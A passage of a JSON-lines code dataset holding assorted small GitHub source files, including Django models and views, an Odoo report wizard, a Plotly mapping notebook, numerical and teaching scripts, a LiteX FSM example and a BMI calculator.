f'\"{self.comment}\"'\n\nclass CustomUserManager(BaseUserManager):\n '''\n Custom user model manager where username is the unique identifiers for authentication\n '''\n def create_user(self, username, password, **extra_fields):\n '''\n Create and save a User with the given username and password.\n '''\n if not username:\n raise ValueError(ugettext_lazy('The Username must be set'))\n user = self.model(username=username, **extra_fields)\n user.set_password(password)\n user.save()\n return user\n\n def create_superuser(self, username, password, **extra_fields):\n '''\n Create and save a SuperUser with the given username and password.\n '''\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n extra_fields.setdefault('is_active', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError(ugettext_lazy('Superuser must have is_staff=True.'))\n if extra_fields.get('is_superuser') is not True:\n raise ValueError(ugettext_lazy('Superuser must have is_superuser=True.'))\n return self.create_user(username, password, **extra_fields)\n\nclass User(AbstractBaseUser, PermissionsMixin):\n class Meta:\n verbose_name = 'کاربر'\n verbose_name_plural = 'کاربران'\n\n def validate_username_custom(name):\n if not all([(lambda x: x in printable[:62])(x) for x in name]) or len(str(name)) < 4:\n raise ValidationError(\n ugettext_lazy('%(name)s نمی تواند یک نام کاربری باشد. 
نام کاربری باید حداقل 4 کاراکتر باشد و فقط می تواند شامل حروف انگلیسی و اعداد باشد.'),\n params={'name': name},\n )\n\n username = models.CharField(\n verbose_name='نام کاربری',\n max_length=40,\n unique=True,\n primary_key=True,\n validators=[validate_username_custom]\n )\n first_name = models.CharField(\n verbose_name='نام',\n max_length=100,\n )\n last_name = models.CharField(\n verbose_name='نام خانوداگی',\n max_length=100,\n )\n phone_regex = RegexValidator(\n regex=r'\\b[0]{1}[9]{1}[0-9]{9}\\b',\n message=\"شماره تلفن همراه باید به فرمت 09123456789 باشد\",\n )\n phone = models.CharField(\n verbose_name='تلفن همراه',\n validators=[phone_regex],\n max_length=17,\n blank=True,\n null=True,\n )\n email = models.EmailField(\n verbose_name='ایمیل',\n unique=True,\n )\n birth_day = models.DateField(\n verbose_name='تاریخ تولد',\n blank=True,\n null=True,\n )\n image = models.ImageField(\n verbose_name='تصویر',\n blank=True,\n null=True,\n upload_to='user_imgs'\n )\n date_joined = models.DateTimeField(\n verbose_name='زمان ثبت نام',\n blank=True,\n default=timezone.now,\n )\n is_staff = models.BooleanField(\n verbose_name='کارمند است؟',\n default=False,\n )\n is_active = models.BooleanField(\n verbose_name='فعال است؟',\n default=True,\n )\n is_superuser = models.BooleanField(\n verbose_name='ابرکاربر',\n default=False,\n )\n follow = models.ManyToManyField(\n 'User',\n verbose_name='دنبال کنندگان',\n blank=True,\n through='Follow',\n )\n USERNAME_FIELD = 'username'\n\n objects = CustomUserManager()\n\n def __str__(self):\n return self.username + ' : ' + self.first_name + \" \" + self.last_name\n\nclass Follow(models.Model):\n class Meta:\n verbose_name = 'ارتباطات کاربران'\n verbose_name_plural = 'ارتباط کاربران'\n\n follower = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n related_name='follower',\n )\n followed = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n related_name='followed',\n )\n","repo_name":"mmshojaefar/Blog","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10196,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18795658391","text":"import re\n\n# A regular expression pattern that matches a sequence of digits\npattern = r'\\d+'\n\n# Some sample text to match against\ntext = 'The answer is 42.'\n\n# Use the search function from the re module to find the first match\nmatch = re.search(pattern, text)\n\n# Print the matched string\nprint(match.group())\n","repo_name":"Daniellem97/retest","sub_path":"retest.py","file_name":"retest.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29106606072","text":"#!/usr/bin/env python2\n\nfrom __future__ import print_function\nimport argparse, os, random, sys\nfrom util import *\n\ndef point(base, length, cryfsm='cryfsm', fsmevade='fsmevade'):\n secret = random.randint(0, base ** length - 1)\n repr = dary_repr(secret, base, length)\n base_2_len = len(str_base(base-1, 2))\n inp = ''.join([dary_repr(int(i, base=base), 2, base_2_len) for i in repr])\n lst = []\n for i in xrange(length):\n for b in xrange(base_2_len):\n lst.append('\"%d\"' % i)\n str = '[' + ','.join(lst) + ']'\n tmp = 'point-%d-%d-tmp.json' % (base, length)\n fname = 'point-%d-%d.json' % (base, length)\n lst = [cryfsm, 'util.cry', '-e', \"(!=) 0b%s\" % inp,\n '-v', \"adjacentConstantBase `{base=%d}\" % base, '-g',\n \"%s\" % str, '-o', tmp]\n try:\n 
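# run() (imported from util) shells out to the external cryfsm binary;\n        # an OSError here usually means the executable is not on PATH.\n        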
run(lst)\n    except OSError:\n        print(\"error: running cryfsm failed\")\n        sys.exit(1)\n    lst = [fsmevade, '-i', tmp, '-o', fname, 'True']\n    try:\n        run(lst)\n    except OSError:\n        print(\"error: running fsmevade failed\")\n        sys.exit(1)\n    os.remove(tmp)\n    with open(fname, 'r') as f:\n        line = f.read()\n    with open(fname, 'w') as f:\n        f.write('# TEST %s 0\\n' % repr)\n        for _ in xrange(5):\n            test = random.randint(0, base ** length - 1)\n            repr = dary_repr(test, base, length)\n            if test != secret:\n                f.write('# TEST %s 1\\n' % repr)\n        f.write(line)\n\ndef main(argv):\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--cryfsm', metavar='PATH', action='store', type=str,\n                        default='cryfsm',\n                        help='set PATH as cryfsm executable')\n    parser.add_argument('--fsmevade', metavar='PATH', action='store', type=str,\n                        default='fsmevade',\n                        help='set PATH as fsmevade executable')\n    parser.add_argument('base', action='store', type=int)\n    parser.add_argument('length', action='store', type=int)\n    args = parser.parse_args()\n    point(args.base, args.length, args.cryfsm, args.fsmevade)\n\nif __name__ == '__main__':\n    try:\n        main(sys.argv)\n    except KeyboardInterrupt:\n        pass\n","repo_name":"0wnrepo/obfuscation","sub_path":"circuits/point-json.py","file_name":"point-json.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"18806692842","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Choropleth Maps\n\n# ## Using Plotly Offline\n\n# Import and configure everything to work offline.\n\n# In[9]:\n\n\nimport plotly.plotly as py\nimport plotly.graph_objs as go \nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\n\n# Now configure everything so that the figures appear in the notebook:\n\n# In[10]:\n\n\ninit_notebook_mode(connected=True) \n\n\n# More information on how to use Plotly Offline can be found [here](https://plot.ly/python/offline/).\n\n# ## Choropleth US Maps\n# \n# Plotly's mapping can be a little hard to get used to at first, so remember to consult the PDF file in the data visualization folder, or [find it online here](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf).\n\n# In[11]:\n\n\nimport pandas as pd\n\n\n# Now we need to start building our data dictionary. 
The easiest way to do this is to use the **dict()** function in the general form:\n# \n# * type = 'choropleth',\n# * locations = list of states\n# * locationmode = 'USA-states'\n# * colorscale= \n# \n# Or a predefined sequence:\n# \n# 'pairs' | 'Greys' | 'Greens' | 'Bluered' | 'Hot' | 'Picnic' | 'Portland' | 'Jet' | 'RdBu' | 'Blackbody' | 'Earth' | 'Electric' | 'YIOrRd' | 'YIGnBu'\n# \n# or create a [custom colorscale](https://plot.ly/python/heatmap-and-contour-colorscales/)\n# \n# * text= list or array of text to display per point\n# * z= array of values on the z axis (state color)\n# * colorbar = {'title':'Título da barra de cores'})\n# \n# Here is a simple example:\n\n# In[12]:\n\n\ndata = dict(type = 'choropleth',\n            locations = ['AZ','CA','NY'],\n            locationmode = 'USA-states',\n            colorscale= 'Portland',\n            text= ['Texto1','Texto2','Texto3'],\n            z=[1.0,2.0,3.0],\n            colorbar = {'title':'Título da barra de cores'})\n\n\n# Next we create the nested layout dictionary:\n\n# In[13]:\n\n\nlayout = dict(geo = {'scope':'usa'})\n\n\n# Then we use:\n# \n#     go.Figure(data = [data],layout = layout)\n# \n# to set up the object that is finally passed to iplot()\n\n# In[14]:\n\n\nchoromap = go.Figure(data = [data],layout = layout)\n\n\n# In[15]:\n\n\niplot(choromap)\n\n\n# ### Real data: US Choropleth Map\n# \n# Now let's walk through an example with some real data, along with a few other options we can add to the data and layout dictionaries.\n\n# In[16]:\n\n\ndf = pd.read_csv('2011_US_AGRI_Exports')\ndf.head()\n\n\n# Now we create a data dictionary with some additional arguments and colorbar arguments:\n\n# In[22]:\n\n\ndata = dict(type='choropleth',\n            colorscale = 'YIOrRd',\n            locations = df['code'],\n            z = df['total exports'],\n            locationmode = 'USA-states',\n            text = df['text'],\n            marker = dict(line = dict(color = 'rgb(255,255,255)',width = 2)),\n            colorbar = {'title':\"Milhões de dólares\"}\n            ) \n\n\n# And our layout dictionary with a few more arguments:\n\n# In[23]:\n\n\nlayout = dict(title = '2011 Exportações de Agricultura dos EUA por Estado',\n              geo = dict(scope='usa',\n                         showlakes = True,\n                         lakecolor = 'rgb(85,173,240)')\n             )\n\n\n# In[24]:\n\n\nchoromap = go.Figure(data = [data],layout = layout)\n\n\n# In[25]:\n\n\niplot(choromap)\n\n\n# # World Choropleth Map\n# \n# Now let's look at an example with a World Map:\n\n# In[26]:\n\n\ndf = pd.read_csv('2014_World_GDP')\ndf.head()\n\n\n# In[27]:\n\n\ndata = dict(\n        type = 'choropleth',\n        locations = df['CODE'],\n        z = df['GDP (BILLIONS)'],\n        text = df['COUNTRY'],\n        colorbar = {'title' : 'GDP Billions US'},\n      ) \n\n\n# In[28]:\n\n\nlayout = dict(\n    title = '2014 Global GDP',\n    geo = dict(\n        showframe = False,\n        projection = {'type':'Mercator'}\n    )\n)\n\n\n# In[29]:\n\n\nchoromap = go.Figure(data = [data],layout = layout)\niplot(choromap)\n\n","repo_name":"masbahnana/Workshop-ciencia-de-dados","sub_path":"3. 
Visualização de dados/Geographical Plotting/Mapas Choropleth.py","file_name":"Mapas Choropleth.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"pt","doc_type":"code","stars":30,"dataset":"github-code","pt":"67"} +{"seq_id":"74648464534","text":"def solution(answers):\n    answer = []\n    one = [1,2,3,4,5]\n    two = [2,1,2,3,2,4,2,5]\n    three = [3,3,1,1,2,2,4,4,5,5]\n\n    score = [0,0,0]\n\n    for i, ans in enumerate(answers):\n        if ans == one[i%5]:\n            score[0] += 1\n        if ans == two[i%8]:\n            score[1] += 1\n        if ans == three[i%10]:\n            score[2] += 1\n\n    max_v = max(score)\n    for i, sc in enumerate(score):\n        if sc == max_v:\n            answer.append(i + 1)\n\n    return answer","repo_name":"unhhyyeexx/ProblemSolving","sub_path":"프로그래머스/lv1/42840. 모의고사/모의고사.py","file_name":"모의고사.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26786440648","text":"# ELIF ADDS A THIRD (OR ANOTHER) OPTION TO THE IF/ELSE CHAIN\r\n\r\nedad = 66\r\n\r\nif edad >= 18 and edad < 65 :\r\n    print(\"Eres mayor de edad\")\r\nelif edad >= 65 :\r\n    print(\"Eres un adulto mayor\")\r\nelse:\r\n    print(\"Eres menor de edad\")\r\n\r\n# FOR STATES HOW MANY TIMES I WANT THE OPERATION PERFORMED\r\n# WHILE KEEPS REPEATING UNTIL THE CONDITION STOPS BEING MET\r\n\r\nnum = 0\r\n\r\nwhile num <= 100 :\r\n    print(num)\r\n    num += 2\r\n\r\n# IF I USE AN INFINITE LOOP: CTRL + C TO STOP THE PROCESS / OR CLOSE EVERYTHING!!!!\r\n\r\n# DO NOT PRINT (LEFT COMMENTED OUT)\r\n\r\n#while True :\r\n    # print(num)\r\n    # num += 2\r\n\r\n# WHILE CAN ALSO BE COMBINED WITH ELSE/IF\r\n\r\nwhile num <= 100 :\r\n    print(num)\r\n    num += 2\r\nelse :\r\n    print(\"MI condicion es igual o mayor a cien\")\r\n\r\n# BREAK WILL EXIT THE WHILE LOOP\r\n\r\nwhile True :\r\n    parametro = input(\">\")\r\n    if parametro == \"exit\" :\r\n        break\r\n    else :\r\n        print(parametro)  # THIS LOOP ASKS FOR WORDS AND PRINTS THEM UNTIL THE USER ENTERS THE KEYWORD, IN THIS CASE \"exit\"\r\n\r\n# == COMPARES / = ASSIGNS / FOR IF/ELSE WITH TRUE/FALSE VARIABLES, USE = TO ASSIGN (NOT TO COMPARE); THIS APPLIES TO TRUE AND FALSE","repo_name":"Saimon01XD/programacion-icinif","sub_path":"PythonProgramacion/Clases/04-Condicionales.py","file_name":"04-Condicionales.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43559989381","text":"from numpy import *\nfrom numpy.linalg import *\n\nprint(\"THIS IS A PROGRAM TO SOLVE A SYSTEM OF LINEAR EQUATIONS USING THE GAUSSIAN ELIMINATION METHOD\")\n\ndef gauss(A,b):\n    A_new = A.copy()\n    b = b.transpose()\n    C = column_stack((A_new,b))\n    if C[1,0] != 0:\n        mult_1 = C[1,0]/C[0,0]\n        C[1] = C[1] - (mult_1 * C[0])\n    if C[2,0] != 0:\n        mult_2 = C[2,0]/C[0,0]\n        C[2] = C[2] - (mult_2 * C[0])\n    if C[2,1] != 0:\n        mult_3 = C[2,1]/C[1,1]\n        C[2] = C[2] - (mult_3 * C[1])\n\n    b_new = C[...,3]\n    C = delete(C, 3, axis=1)\n    # C is upper triangular after forward elimination, so inverting it here\n    # stands in for the usual back-substitution step\n    x = dot(inv(C),b_new)\n    print(\"After the forward elimination, the result is: \")\n    print(\"A: \")\n    print(C)\n    print(\"b: \")\n    print(b_new)\n\n    return x\n\n\nA = array([[5, -2, 3], [-3, 9, 1], [2, -1, -7]], float)\nb = array([-1,2,3], float)\n\nx = gauss(A,b)\n\nprint(\"A: \")\nprint(A)\n\nprint(\"b: \")\nprint(b)\n\nprint(\"X: 
\")\nprint(x)\n","repo_name":"prismathic/numerical_algorithms","sub_path":"my_gauss.py","file_name":"my_gauss.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74344269652","text":"import time\nfrom datetime import datetime\nfrom openerp import api, fields, models, _\nimport openerp.addons.decimal_precision as dp\nfrom dateutil.relativedelta import relativedelta\nfrom openerp.exceptions import UserError\n\n\nclass ContractCashIn(models.TransientModel):\n _name = \"contract.cash.in\"\n _description = \"Contract Cash In\"\n\n product_id = fields.Many2one('product.product', '产品', required=True)\n end_date = fields.Date('截止日期', required=True,\n default=lambda *a: time.strftime('%Y-%m-%d'))\n cash = fields.Boolean('头寸')\n\n @api.multi\n def make_report(self):\n product_id = self.product_id.id\n end_date = self.end_date\n cash = self.cash\n report_data = self.env['linyan.contract'].search_read([('product_id', '=', product_id), ('contract_date', '<=', end_date), ('cash', '=', cash), (\n 'state', '!=', 'cancel'), ('buy', '=', True)], ['partner_id', 'product_id', 'year', 'month', 'contract_name', 'actual_qty', 'price', 'amount', 'cash'])\n values = []\n for data in report_data:\n partner_id = data['partner_id'][0]\n product_id = data['product_id'][0]\n year = data['year']\n month = data['month']\n contract_name = data['contract_name']\n actual_qty = data['actual_qty']\n price = data['price']\n amount = data['amount']\n cash = data['cash']\n values.append({\n 'partner_id': partner_id,\n 'product_id': product_id,\n 'year': year,\n 'month': month,\n 'contract_name': contract_name,\n 'actual_qty': actual_qty,\n 'price': price,\n 'amount': amount,\n 'cash': cash})\n self._cr.execute(\"delete from linyan_cash_report\")\n res_ids = []\n for val in values:\n report = self.env['linyan.cash.report'].create(val)\n res_ids.append(report.id)\n name = '空头买入'\n if cash:\n name = '头寸买入'\n return {\n 'type': 'ir.actions.act_window',\n 'name': name,\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'linyan.cash.report',\n 'res_id': res_ids\n }\n\n\nclass ContractCashOut(models.TransientModel):\n _name = \"contract.cash.out\"\n _description = \"Contract Cash Out\"\n\n product_id = fields.Many2one('product.product', '产品', required=True)\n end_date = fields.Date('截止日期', required=True,\n default=lambda *a: time.strftime('%Y-%m-%d'))\n cash = fields.Boolean('头寸')\n\n @api.multi\n def make_report(self):\n product_id = self.product_id.id\n end_date = self.end_date\n cash = self.cash\n report_data = self.env['linyan.contract'].search_read([('product_id', '=', product_id), ('contract_date', '<=', end_date), ('cash', '=', cash), (\n 'state', '!=', 'cancel'), ('buy', '=', False)], ['partner_id', 'product_id', 'year', 'month', 'contract_name', 'actual_qty', 'price', 'amount', 'cash'])\n values = []\n for data in report_data:\n partner_id = data['partner_id'][0]\n product_id = data['product_id'][0]\n year = data['year']\n month = data['month']\n contract_name = data['contract_name']\n actual_qty = data['actual_qty']\n price = data['price']\n amount = data['amount']\n cash = data['cash']\n values.append({\n 'partner_id': partner_id,\n 'product_id': product_id,\n 'year': year,\n 'month': month,\n 'contract_name': contract_name,\n 'actual_qty': actual_qty,\n 'price': price,\n 'amount': amount,\n 'cash': cash})\n self._cr.execute(\"delete from linyan_cash_report\")\n res_ids = []\n for val in values:\n report = 
self.env['linyan.cash.report'].create(val)\n res_ids.append(report.id)\n name = '空头卖出'\n if cash:\n name = '头寸卖出'\n return {\n 'type': 'ir.actions.act_window',\n 'name': name,\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'linyan.cash.report',\n 'res_id': res_ids\n }\n\n\nclass MoveQuantity(models.TransientModel):\n _name = \"move.quantity\"\n\n product_id = fields.Many2one('product.product', '产品', required=True)\n end_date = fields.Date('截止日期', required=True, default=lambda *a: time.strftime('%Y-%m-%d'))\n\n @api.multi\n def make_report(self):\n cr = self._cr\n product_id = self.product_id.id\n end_date = (datetime.strptime(self.end_date, \"%Y-%m-%d\") + relativedelta(days=1)).strftime('%Y-%m-%d')\n move_in = self.env['logistics.move'].search([('product_id', '=', product_id), ('date_done', '<', end_date), ('state', '=', 'done'), ('move_out', '=', False), ('move_in', '=', True)])\n in_datas = []\n if move_in.ids:\n cr.execute(\"select lm.warehouse_dest_id as warehouse_id, lm.product_id, lc.make_company, lc.supplierinfo_id, sum(lm.actual_qty) as actual_qty from logistics_move lm left join linyan_contract lc on lm.contract_id = lc.id where lm.id in %s group by lm.warehouse_dest_id, lm.product_id, lc.make_company, lc.supplierinfo_id\", (tuple(move_in.ids),))\n in_datas = cr.dictfetchall()\n new_in_datas = {}\n for idt in in_datas:\n k = '-'.join([str(idt['warehouse_id']) or '0', idt['make_company'] or '', str(idt['supplierinfo_id']) or '0'])\n new_in_datas.update({k: idt})\n move_out = self.env['logistics.move'].search([('product_id', '=', product_id), ('date_done', '<', end_date), ('state', '=', 'done'), ('move_out', '=', True), ('move_in', '=', False)])\n out_datas = []\n if move_out.ids:\n cr.execute(\"select lm.warehouse_src_id as warehouse_id, lm.product_id, lc.make_company, lc.supplierinfo_id, sum(lm.actual_qty) as actual_qty from logistics_move lm left join linyan_contract lc on lm.contract_id = lc.id where lm.id in %s group by lm.warehouse_src_id, lm.product_id, lc.make_company, lc.supplierinfo_id\", (tuple(move_out.ids),))\n out_datas = cr.dictfetchall()\n new_out_datas = {}\n for odt in out_datas:\n k = '-'.join([str(odt['warehouse_id']) or '0', odt['make_company'] or '', str(odt['supplierinfo_id']) or '0'])\n new_out_datas.update({k: odt})\n quantity_datas = []\n in_lists = list(set(new_in_datas).difference(set(new_out_datas)))\n for il in in_lists:\n quantity_datas.append(new_in_datas[il])\n out_lists = list(set(new_out_datas).difference(set(new_in_datas)))\n for ol in out_lists:\n quantity_out_datas = new_out_datas[ol].copy()\n quantity_out_datas.update({'actual_qty': -new_out_datas[ol]['actual_qty']})\n quantity_datas.append(quantity_out_datas)\n inter_lists = list(set(new_in_datas) & set(new_out_datas))\n for intl in inter_lists:\n actual_qty = new_in_datas[intl]['actual_qty'] - new_out_datas[intl]['actual_qty']\n quantity_inter_datas = new_in_datas[intl].copy()\n quantity_inter_datas.update({'actual_qty': actual_qty})\n quantity_datas.append(quantity_inter_datas)\n self._cr.execute(\"delete from move_quantity_report\")\n res_ids = []\n for qty_dt in quantity_datas:\n report = self.env['move.quantity.report'].create(qty_dt)\n res_ids.append(report.id)\n return {\n 'type': 'ir.actions.act_window',\n 'name': '库存报表',\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'move.quantity.report',\n 'res_id': res_ids\n }\n\n\nclass LinyanMakeInvoice(models.TransientModel):\n _name = \"linyan.make.invoice\"\n\n end_date = fields.Date('截止日期', required=True, 
default=lambda *a: time.strftime('%Y-%m-%d'))\n\n @api.multi\n def make_report(self):\n cr = self._cr\n end_date = self.end_date\n cr.execute(\"delete from linyan_invoice_report\")\n # Dates are passed as bind parameters rather than interpolated into the SQL string, to avoid SQL injection.\n cr.execute(\"\"\"select COALESCE(t1.rece_invoice, 0.0) as rece_invoice,\n -1*COALESCE(t2.pay_invoice, 0.0) as pay_invoice,\n -1*COALESCE(t3.rece_payment, 0.0) as rece_payment,\n COALESCE(t4.pay_payment, 0.0) as pay_payment,\n COALESCE(t1.rece_invoice, 0.0)-COALESCE(t3.rece_payment, 0.0)-COALESCE(t2.pay_invoice, 0.0)+COALESCE(t4.pay_payment, 0.0) as amount\n from (select 1 as rel_id, sum(residual) as rece_invoice from linyan_invoice where invoice_type = 'out_invoice'\n and date_invoice < %s) t1 left join (select 1 as rel_id, sum(residual) as pay_invoice from linyan_invoice\n where invoice_type = 'in_invoice' and date_invoice < %s) t2 on t1.rel_id = t2.rel_id left join\n (select 1 as rel_id, sum(remaining_amount) as rece_payment from linyan_payment where payment_type = 'inbound'\n and payment_date < %s) t3 on t1.rel_id = t3.rel_id left join\n (select 1 as rel_id, sum(remaining_amount) as pay_payment from linyan_payment where payment_type = 'outbound'\n and payment_date < %s) t4 on t1.rel_id = t4.rel_id\"\"\", (end_date, end_date, end_date, end_date))\n value = cr.dictfetchone()\n if value:\n self.env['linyan.invoice.report'].create(value)\n return {\n 'type': 'ir.actions.act_window',\n 'name': '库存报表',\n 'view_type': 'form',\n 'view_mode': 'tree',\n 'res_model': 'linyan.invoice.report'\n }\n return {'type': 'ir.actions.act_window_close'}\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"CharlesBird/Resources","sub_path":"odoo/linyan_contract/wizard/contract_make_report.py","file_name":"contract_make_report.py","file_ext":"py","file_size_in_byte":10013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22996698780","text":"class Solution:\n def RemoveDuplicates_I(self, s: str, k: int) -> str:\n stack = []\n\n for c in s:\n if stack and stack[-1][0] == c:\n stack[-1][1] += 1\n if stack[-1][1] == k:\n stack.pop()\n else:\n stack.append([c, 1])\n ans = \"\"\n for x in stack:\n ans += x[0] * x[1]\n\n return ans\n\n def RemoveDuplicates_II(self,s,k):\n stack = []\n i = 0\n\n while(i datetime(2020, 10, 25, 20, 0, 0)\n voting_in_session = datetime.now() < datetime(2020, 10, 25, 8, 0, 0)\n return render(request, 'web/index.html', {\n 'partners': partners,\n 'voting_not_started': voting_not_started,\n 'voting_ended': voting_ended,\n 'voting_in_session': voting_in_session\n })\n\n\ndef about(request):\n members = OrganizationMember.objects.select_related('group').filter(group__isnull=False).order_by('group__order',\n 'order', 'name')\n\n municipalities_with_members = Municipality.objects.annotate_with_organization_members_count() \\\n .exclude(organization_members_count=0) \\\n .prefetch_related(Prefetch('organization_members', OrganizationMember.objects.order_by('name'))) \\\n .order_by('slug')\n\n return render(request, 'web/about.html', {\n 'members': members,\n 'municipalities_with_members': municipalities_with_members\n })\n\n\ndef join_us(request):\n return render(request, 'web/join-us.html')\n\n\n@require_http_methods([\"POST\"])\ndef subscribe(request):\n form = EmailSubscriptionForm(request.POST)\n try:\n if form.is_valid():\n email = form.cleaned_data['email']\n request_info = get_request_information(request)\n\n EmailSubscription(\n email=email,\n user_ip=request_info.client_ip,\n
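                # the remaining fields are filled from get_request_information(request) above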
user_agent=request_info.client_user_agent,\n user_country=request_info.client_country\n ).save()\n else:\n return HttpResponse(status=HTTP_422_UNPROCESSABLE_ENTITY, content='El. paštas neteisingas')\n except IntegrityError:\n return HttpResponse(status=HTTP_409_CONFLICT, content='El. paštas jau registruotas.')\n\n return HttpResponse(status=HTTP_201_CREATED)\n\n\n@login_required\ndef user_profile(request):\n user_questions = Question.objects.filter_questions_by_user_or_for_user(request.user) \\\n .select_related_for_display() \\\n .annotate_with_last_created_at() \\\n .order_by('-last_created_at', 'pk')\n\n error = None\n if request.method == 'POST':\n disconnect_form = DisconnectForm(request.POST, request=request)\n\n if disconnect_form.is_valid():\n disconnect_form.save()\n else:\n error = \"Unable to disconnect social account. Try again.\"\n\n return render(request, 'web/user-profile.html', {\n 'error': error,\n 'user_questions': user_questions\n })\n\n\ndef health_check(request):\n return HttpResponse(\"OK\")\n","repo_name":"zinaukarenku/zkr-platform","sub_path":"web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42373731730","text":"from flectra.addons.event.tests.common import TestEventCommon\nfrom flectra.addons.sales_team.tests.common import TestSalesCommon\n\n\nclass TestEventSaleCommon(TestEventCommon, TestSalesCommon):\n\n @classmethod\n def setUpClass(cls):\n super(TestEventSaleCommon, cls).setUpClass()\n\n cls.event_product = cls.env['product.product'].create({\n 'name': 'Test Registration Product',\n 'description_sale': 'Mighty Description',\n 'list_price': 10,\n 'event_ok': True,\n 'standard_price': 30.0,\n 'type': 'service',\n })\n","repo_name":"flectra-hq/flectra","sub_path":"addons/event_sale/tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"67"} +{"seq_id":"32829698025","text":"# Benchmark the simulation\n\nimport sciris as sc\nimport covasim as cv\n\nsim = cv.Sim()\nsim['n_days'] = 180\nto_profile = 'step' # Must be one of the options listed below...currently only 1\n\nfunc_options = {\n 'make_contacts': cv.make_random_contacts,\n 'make_randpop': cv.make_randpop,\n 'person': cv.Person.__init__,\n 'make_people': cv.make_people,\n 'init_people': sim.init_people,\n 'initialize': sim.initialize,\n 'run': sim.run,\n 'step': sim.step,\n}\n\nsc.profile(run=sim.run, follow=func_options[to_profile])\n","repo_name":"bosetinsky/eswatini-covasim","sub_path":"tests/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74111029993","text":"#!/usr/bin/env python3\n\nfrom litex.gen.fhdl import verilog\nfrom migen import *\n\n# from migen.fhdl import verilog\n\n\nclass Example(Module):\n def __init__(self):\n self.clock_domains += ClockDomain(\"sys\")\n self.s = Signal()\n self.counter = Signal(8)\n x = Array(Signal(name=\"a\") for i in range(7))\n\n myfsm = FSM()\n self.submodules += myfsm\n\n myfsm.act(\n \"FOO\",\n Display(\"FOO norm\"),\n DisplayOnEnter(\"FOO on enter\"),\n self.s.eq(1),\n NextState(\"BAR\"),\n )\n myfsm.act(\n \"BAR\",\n Display(\"BAR norm\"),\n DisplayOnEnter(\"BAR on enter\"),\n self.s.eq(0),\n NextValue(self.counter, self.counter + 1),\n NextValue(x[self.counter], 
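                # NextValue schedules the write for the next clock cycle, into the array slot indexed by the current counter value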
89),\n NextState(\"FOO\"),\n )\n\n self.be = myfsm.before_entering(\"FOO\")\n self.ae = myfsm.after_entering(\"FOO\")\n self.bl = myfsm.before_leaving(\"FOO\")\n self.al = myfsm.after_leaving(\"FOO\")\n\n\nif __name__ == \"__main__\":\n example = Example()\n print(\n verilog.convert(\n example,\n {example.s, example.counter, example.be, example.ae, example.bl, example.al},\n regular_comb=True,\n )\n )\n","repo_name":"jevinskie/litelitedram","sub_path":"examples/fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"1675062312","text":"import traceback\r\nfrom functools import lru_cache\r\n\r\n\r\nclass BMICalculator:\r\n def __init__(self):\r\n # Move to yaml config if required\r\n self.metadata = {\r\n 'CATEGORY_RANGE': [\r\n {'LOW': 0, 'HIGH': 18.4, 'CATEGORY': 'Underweight', 'HEALTHRISK': 'Malnutrition risk'},\r\n {'LOW': 18.5, 'HIGH': 24.9, 'CATEGORY': 'Normal weight', 'HEALTHRISK': 'Low risk'},\r\n {'LOW': 25, 'HIGH': 29.9, 'CATEGORY': 'Overweight', 'HEALTHRISK': 'Enhanced risk'},\r\n {'LOW': 30, 'HIGH': 34.9, 'CATEGORY': 'Moderately obese', 'HEALTHRISK': 'Medium risk'},\r\n {'LOW': 35, 'HIGH': 39.9, 'CATEGORY': 'Severly obese', 'HEALTHRISK': 'High risk'}\r\n ],\r\n 'CATEGORY_MAX': {'LOW': 40, 'CATEGORY': 'Very severly obese', 'HEALTHRISK': 'Very high risk'}\r\n }\r\n\r\n def __str__(self):\r\n return 'Package to compute BMI and category'\r\n\r\n def convert_cm_to_m(self, value):\r\n return value / 100\r\n\r\n def check_zero(self, value):\r\n return True if value > 0 else False\r\n\r\n @lru_cache(maxsize=128)\r\n def calculate_bmi(self, weight, height):\r\n if self.check_zero(weight) and self.check_zero(height):\r\n try:\r\n height_in_meter = self.convert_cm_to_m(height)\r\n bmi = round(weight / (height_in_meter * height_in_meter), 1)\r\n return {'status': True, 'output': bmi}\r\n except:\r\n return {'status': False, 'error': traceback.format_exc()}\r\n else:\r\n return {'status': False, 'error': 'zero value is not acceptable'}\r\n\r\n 